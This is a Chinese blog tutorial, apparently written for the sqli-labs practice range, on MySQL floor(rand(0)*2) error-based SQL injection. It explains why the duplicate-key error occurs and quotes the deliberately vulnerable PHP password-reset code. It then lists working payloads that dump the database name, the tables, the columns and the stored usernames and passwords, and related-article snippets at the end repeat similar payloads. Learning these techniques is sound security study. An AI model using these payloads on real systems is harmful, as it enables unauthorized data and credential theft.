SQL报错注入之floor

已于 2024-08-06 09:42:23 修改
阅读量989 收藏 11
点赞数 27
文章标签: sql 数据库
于 2024-08-06 00:48:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78549931/article/details/140939231
版权

目录

1.简述

2.关键函数说明

1.rand函数

2.floor(rand(0)*2)函数

3.group by 函数

4.count(*)函数

3.报错分析

4.报错流程

4.1寻找注入点

 4.2爆数据库名

4.3爆表名

4.4爆字段名

4.5查询数据

1.简述

利用 select count(),(floor(rand(0)2))x from table group by x,因为查询的结果主键不唯一,导致数据库报错,通过 concat 函数,连接注入语句与 floor(rand(0)*2)函数,实现将注入结果与报错信息回显的注入方式。

floor报错注入有 count 、group by 、floor、rand四个关键函数

2.关键函数说明

1.rand函数

rand() 可以产生一个在0和1之间的随机数。

可见,直接使用rand函数每次产生的数都不同,但是当提供了一个固定的随机数的种子0之后:

每次产生的值都是一样的。也可以称之为伪随机(产生的数据都是可预知的)。 查看多个数据看一下。(users是一个有6行数据的表)

这样第一次产生的随机数和第二次完全一样,也就是可以预测的。 利用的时候rand(0)*2为什么要乘以 2 呢?这就要配合 floor 函数来说了。

2.floor(rand(0)*2)函数

floor() 函数的作用就是返回小于等于括号内该值的最大整数。

并且根据固定的随机数种子0,他每次产生的随机数列都是相同的0 1 1 0 1 1

3.group by 函数

group by 主要用来对数据进行分组(相同的分为一组)

img

首先我们在查询的时候是可以使用as用其他的名字代替显示的:

img

但是在实际中可以缺省as直接查询,显示的结果是一样的:

img

然后就可以用group by函数进行分组,并按照x进行排序

注意:最后x这列中显示的每一类只有一次,前面的a的是第一次出现的id值

img

4.count(*)函数

count(*)统计结果的记录数。

这里与group by结合使用看一下:

img

这里就是对重复性的数据进行了整合,然后计数,后面的x就是每一类的数量。

3.报错分析

首先mysql遇到该语句时会建立一个虚拟表。该虚拟表有两个字段,一个是分组的 key ,一个是计数值 count()。也就对应于实验中的 user_name 和 count()。 然后在查询数据的时候,首先查看该虚拟表中是否存在该分组,如果存在那么计数值加1,不存在则新建该分组。

然后mysql官方有给过提示,就是查询的时候如果使用rand()的话,该值会被计算多次,那这个"被计算多次"到底是什么意思,就是在使用group by的时候,floor(rand(0)2)会被执行一次,如果虚表不存在记录,插入虚表的时候会再被执行一次,我们来看下floor(rand(0)2)报错的过程就知道了,从上面的函数使用中可以看到在一次多记录的查询过程中floor(rand(0)2)的值是定性的,为011011 (这个顺序很重要),报错实际上就是floor(rand(0)2)被计算多次导致的,我们还原一下具体的查询过程:

(1)查询前默认会建立空虚拟表如下图:

img

(2)取第一条记录,执行floor(rand(0)*2),发现结果为0(第一次计算), 0 1 1 0 1 1

img

(3)查询虚拟表,发现0的键值不存在,则插入新的键值的时候floor(rand(0)*2)会被再计算一次,结果为1(第二次计算),插入虚表,这时第一条记录查询完毕,如下图: 

img

(4)查询第二条记录,再次计算floor(rand(0)*2),发现结果为1(第三次计算)

img

(5)查询虚表,发现1的键值存在,所以floor(rand(0)2)不会被计算第二次,直接count()加1,第二条记录查询完毕,结果如下:

img

(6)查询第三条记录,再次计算floor(rand(0)*2),发现结果为0(第4次计算)

img

(7)查询虚表,发现键值没有0,则数据库尝试插入一条新的数据,在插入数据时floor(rand(0)*2)被再次计算,1作为虚表的主键,其值为1(第5次计算),插入

img

然而1这个主键已经存在于虚拟表中,而新计算的值也为1(主键键值必须唯一),所以插入的时候就直接报错了。

整个查询过程floor(rand(0)*2)被计算了5次,查询原数据表3次,所以这就是为什么数据表中需要最少3条数据,使用该语句才会报错的原因。

4.报错流程

4.1寻找注入点

根据页面展示是一个密码重置页面,也就是说我们已经登录系统了

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);  

$passwd=$_POST['passwd'];


//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);


// connectivity 
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
		$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);
  		echo "<br>";
	
	
	
		if (mysql_error())
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			print_r(mysql_error());
			echo "</br></br>";
			echo "</font>";
		}
		else
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			//echo " You password has been successfully updated " ;		
			echo "<br>";
			echo "</font>";
		}
	
		echo '<img src="../images/flag1.jpg"   />';	
		//echo 'Your Password:' .$row['password'];
  		echo "</font>";
	


  	}
	else  
	{
		echo '<font size="4.5" color="#FFFF00">';
		//echo "Bug off you Silly Dumb hacker";
		echo "</br>";
		echo '<img src="../images/slap1.jpg"   />';
	
		echo "</font>";  
	}
}

然后查看我们源码,是根据我们提供的账户名去数据库查看用户名和密码,如果账户名正确那么将密码改成你输入的密码。再执行这条sql语句之前会对输入的账户名进行检查,对输入的特殊字符转义。所以我们能够利用的只有更新密码的sql语句。

 4.2爆数据库名

1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)y)#

根据结果得出数据库名为'security'

4.3爆表名

1' and (select 1 from (select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand(0)*2))x from information_schema.tables group by x)y)#

根据结果得出表名为emails,referers,uagents,users

4.4爆字段名

根据表名知道可能用户的账户和密码是在users表中,接下来我们就是得到该表下的字段名以及内容。

1' and (select 1 from (select count(*),concat((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),floor(rand(0)*2))x from information_schema.tables group by x)y)#

 根据结果得出字段名为id,username,password

4.5查询数据

1' and (select 1 from (select count(*),concat((select concat(username,id,password) from users limit 1, 1),floor(rand(0)*2))x from information_schema.tables group by x)y)#

由于查询结果过长,则可以使用limit函数来逐一爆出数据

本次floor报错注入到此结束,感兴趣的同学可以在GitHub上拉取sqli-labs-master靶场进行测试 

半ོ糖ོ
关注
  • 27
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入floor薛定谔报错注入以及报错原理
maluxiao123的博客
03-22 812
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入、报错注入、bool盲注、延时注入、堆叠注入、二次注入、宽字节注入、http头注入、DNS LOAD注入。 sql注入报错注入利用的是页面返回了数据库报错的内容,当回显注入无法使用时使用报错注入,可用的报错函数有很多,下面介绍常用的三种报错注入以及原理。floor报错,updatexml以及extarctvalue 输入单引号发现有sql报错,可以使用报错注入 payload: ...
sql注入floor报错注入原理详解
哦 卷!
10-25 2577
floor()报错注入的原因是group by在向统计表插入数据时,由于rand()多次计算导致插入统计表时主键重复,从而报错。又因为报错前concat_ws()SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。
sql注入floor报错注入原理)
Bu2n的博客
12-16 1276
floor()报错 利用语句 需要配合联合查询 -1 union select count(*) from information_schema.tables group by concat(floor(rand(0)*2) ,database()) 原理 count(*)与group by配合使用过程会产生一张空的虚拟表,接着逐个查询group_key插入虚拟表,插完调用count() 插入虚拟表过程 在查询数据的时候,首先判断虚拟表是否存在该分组,如果存在,计数器+1,不存在则新建该分组 floor(
SQL注入floor报错注入
weixin_46133275的博客
09-08 1935
SQL注入floor报错注入原理一、count()函数、group by二、floor()函数三、rand()函数四、报错初体验五、报错注入1、获取当前数据库2、获取当前用户六、靶场报错注入1、获取当前数据库2、获取表名3、获取字段名4、获取字段内容总结 原理 通过使用count()、floor()、rand()、group by四个条件形成主键重复的错误 count():计算满足某一条件下的行数 floor():向下取整的函数 rand():生成0~1之间的浮点数 count():group
SQL注入报错注入floor()报错注入原理分析
黄乔国PHP
02-27 2507
对于extractValue和updateXML函数来说比较好理解,就不做解释了,这里只对floor函数的报错注入进行讲解。首先我们先要知道floor()报错注入的形式:这个相对固定的语句格式,导致的数据库报错。实际利用通过 concat 函数,连接注入语句与 floor(rand(0)*2)函数,就实现了注入结果与报错信息回显的注入方式。所以我们如果想要理解floor()报错注入的原理,我们首先需要明白:rand(),floor(),group by, count()这几个的意思。
SQL注入floor报错注入以及各个部分详细分析 + iwebsec 实例分析 + updatexml() 报错 + extractvalue() 报错
m0_50917178的博客
12-09 4096
文章目录前言一、什么是floor报错注入二、利用iwebsec模拟实际注入过程三、updatexml()和extractvalue()报错注入四、问题 前言 本文为作者的学习笔记,主要介绍了floor注入原理,利用注入代码(payload)分析每个部分的作用以此来解释floor注入的原理。在解释过程会使用phpstudy搭建的MySQL环境,并且利用iwebsec漏洞库来实践。最后顺带介绍updatexml和extractvalue报错注入。 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是
SQL报错注入
qq_64332865的博客
02-18 605
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
SQL注入报错注入
qq_45557130的博客
10-07 566
sql注入报错注入
关于SQL报错注入原理详细解析
qq_45672254的博客
11-17 710
关于SQL报错注入原理详细解析 之前读过多篇关于Mysql报错注入floor(rand(0)*2)报错原理探究的文章,都觉得原理阐述大同小异,但在具体细节上,还是不太明白,结合看过的文章和自己的理解,对SQL报错注入原理进行更细致的分析,身为一名网络安全小白,也是想和刚入门的同学一起研究sql注入原理,文章如果有错误的地方,希望大佬批评指正。有兴趣的同学可以查看此篇文章的链接,了解sql报错注入的一般原理:Mysql报错注入floor(rand(0)*2)报错原理探究 在报错原理分析,主要困惑我的地方
24-2 SQL注入 - 利用报错函数 floor 带回回显
weixin_43263566的博客
02-09 690
这个函数用于计算满足某一条件下的行数,是SQL的一个聚合函数,常用于统计查询结果的记录数。: 生成一个0到1之间的随机浮点数。每次调用时,都会产生一个新的随机数。: 用于结合聚合函数,按照一个或多个列对结果集进行分组。: 向下取整函数,可以将其参数值向下舍入到最接近的整数。语句只能包含聚合函数或在。
SQL注入floor报错注入的形成原理分析
Neonline254的博客
01-13 1379
进行SQL注入时,相信很多同学在遇到前端不回显时,会尝试SQL报错注入。常见的报错注入有:floor报错注入、updatexml报错注入和extractvalue报错注入等,不同于后两者利用Xpath解析错误,floor报错注入的成因更加复杂。本文将详细地分析floor报错注入的成因,希望能对您有所帮助。
最常见的SQL报错注入函数(floor、updatexml、extractvalue)及payload总结
Welcome To Myon'Blog !
12-24 5412
extractvalue() 能查询字符串的最大长度为 32,如果我们想要的结果超过 32,就要用 substring() 函数截取或 limit 分页,一次查看最多 32 位。其实有时候我们可以使用group_concat()将所以查询内容列出,但是要取决于题目具体环境,如果无法使用,则使用limit语句来限制查询结果的列数,逐条查询。但是这里回显要么存在,要么无回显,因此无法使用联合查询注入,而且也不存在回显为真或者假两种情况,排除掉盲注,那么这关需要使用的是报错注入
4.2.1SQL注入floor报错原理
最新发布
qq_64177395的博客
09-04 589
floor()报错注入的原因是group by在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前concant()SQL语句或者函数被执行,所以改语句报错而且被抛出的主键是SQL语句或数执行后的结果。
SQL注入报错注入floor、extractvalue、updatexml)
qq_60463414的博客
07-31 1798
sql注入报错注入
SQL注入实战之报错注入篇(updatexml extractvalue floor
qq_41272376的博客
03-03 1438
SQL注入实战之报错注入篇(updatexml extractvalue floor) 知识铺垫 在上一篇我们在漏洞页面进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入报错注入篇。 首先我们来细分一下SQL注入分类 SQL注入分类: 回显正常—> 联合查询 union select 回显报错—> Duplicate entry() extractvalue()    updatexml() 盲注 —>布尔型盲注 基于时间的盲注sleep()
floor()报错注入
热门推荐
超人学飞的日子
06-11 1万+
floor()报错注入准确地说应该是floor,count,group by冲突报错是当这三个函数在特定情况一起使用产生的错误。首先看经典的floor注入语句:and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)第一眼看...
SQL注入:floor()报错注入
爱党人士
05-09 6342
基础知识: floor(): 去除小数部分 rand(): 产生随机数 rand(x): 每个x对应一个固定的值,但是如果连续执行多次值会变化,不过也是可预测的 floor报错payload: and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables ...
sql注入-5floor报错注入
技术骨干小李的博客
07-20 604
floor报错注入的基本学习
报错注入floor()
05-30
如果您遇到了“报错注入”,且报错信息与floor()函数有关,可能是因为您在SQL查询语句使用了floor()函数,并且注入的语句使用了错误的参数类型或值,导致SQL语句无法正确执行。这种情况下,攻击者通常会在注入语句添加一些特殊字符或关键字,从而触发floor()函数的错误,进而获得更多的有用信息。 为了避免报错注入,应该使用SQL参数化查询语句,而不是拼接字符串。在参数化查询,查询语句和参数分别传递给数据库,并且会对参数进行验证和转义,从而防止注入攻击。此外,还可以在应用程序启用严格的输入验证,限制用户输入的数据类型和长度,从而进一步增强安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值